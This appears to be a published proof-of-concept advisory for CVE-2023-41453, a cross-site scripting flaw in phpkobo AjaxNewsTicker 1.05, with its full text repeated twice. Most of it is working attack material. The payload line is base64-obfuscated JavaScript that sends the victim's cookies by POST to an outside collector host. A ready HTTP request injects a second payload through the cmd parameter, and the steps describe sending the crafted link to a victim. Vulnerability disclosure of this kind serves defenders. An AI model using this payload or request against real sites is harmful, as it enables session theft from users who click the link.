RNPG/Cross Site Scripting (XSS) Vulnerability PoC #9 - AjaxNewsTicker - CVE-2023-41453 .txt Secret

## Cross Site Scripting (XSS) Vulnerability PoC #9 - AjaxNewsTicker - CVE-2023-41453 .txt
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the cmd parameter in the index.php component.
Attack Vectors:  To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.
Attack Type: Remote
Payload: <svg+onload=javascript:eval(atob('ZmV0Y2goJ2h0dHBzOi8vajNuNjYzbzV5bGRpbHJxc3ljeWlxMnYzY3VpbTZiLm9hc3RpZnkuY29tJywgewptZXRob2Q6ICdQT1NUJywKbW9kZTogJ25vLWNvcnMnLApib2R5OmRvY3VtZW50LmNvb2tpZQp9KTs='))>
Assigned CVE-ID: CVE-2023-41453
Discoverer: Alireza AmirHeydari, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce
1. Browse the the following URL: https://<target.xyz>/ntic/install/index.php
2.You can create your malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.

#PoC

GET /ntic/install/index.php?_be=1&requ=%7B%22cmd%22%3A%22<svg+onload=javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='))>2%22%2C%22form%22%3A%7B%7D%2C%22wdata%22%3A%22%7B%5C%22start%5C%22%3A%7B%7D%7D%22%7D HTTP/1.1
Host: target.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://target.xyz
Connection: close
Referer: http://target.xyz/ntic/install/
	Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
	Vendor of Product: phpkobo
	Affected Product Code Base: AjaxNewsTicker
	Product Version: 1.05
	Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the cmd parameter in the index.php component.
	Attack Vectors: To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.
	Attack Type: Remote
	Payload: <svg+onload=javascript:eval(atob('ZmV0Y2goJ2h0dHBzOi8vajNuNjYzbzV5bGRpbHJxc3ljeWlxMnYzY3VpbTZiLm9hc3RpZnkuY29tJywgewptZXRob2Q6ICdQT1NUJywKbW9kZTogJ25vLWNvcnMnLApib2R5OmRvY3VtZW50LmNvb2tpZQp9KTs='))>
	Assigned CVE-ID: CVE-2023-41453
	Discoverer: Alireza AmirHeydari, Raspina Net Pars Group (RNPG Ltd.)

	Steps To Reproduce
	1. Browse the the following URL: https://<target.xyz>/ntic/install/index.php
	2.You can create your malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.

	#PoC

	GET /ntic/install/index.php?_be=1&requ=%7B%22cmd%22%3A%22<svg+onload=javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='))>2%22%2C%22form%22%3A%7B%7D%2C%22wdata%22%3A%22%7B%5C%22start%5C%22%3A%7B%7D%7D%22%7D HTTP/1.1
	Host: target.xyz
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
	Accept: application/json, text/javascript, /; q=0.01
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	X-Requested-With: XMLHttpRequest
	Origin: http://target.xyz
	Connection: close
	Referer: http://target.xyz/ntic/install/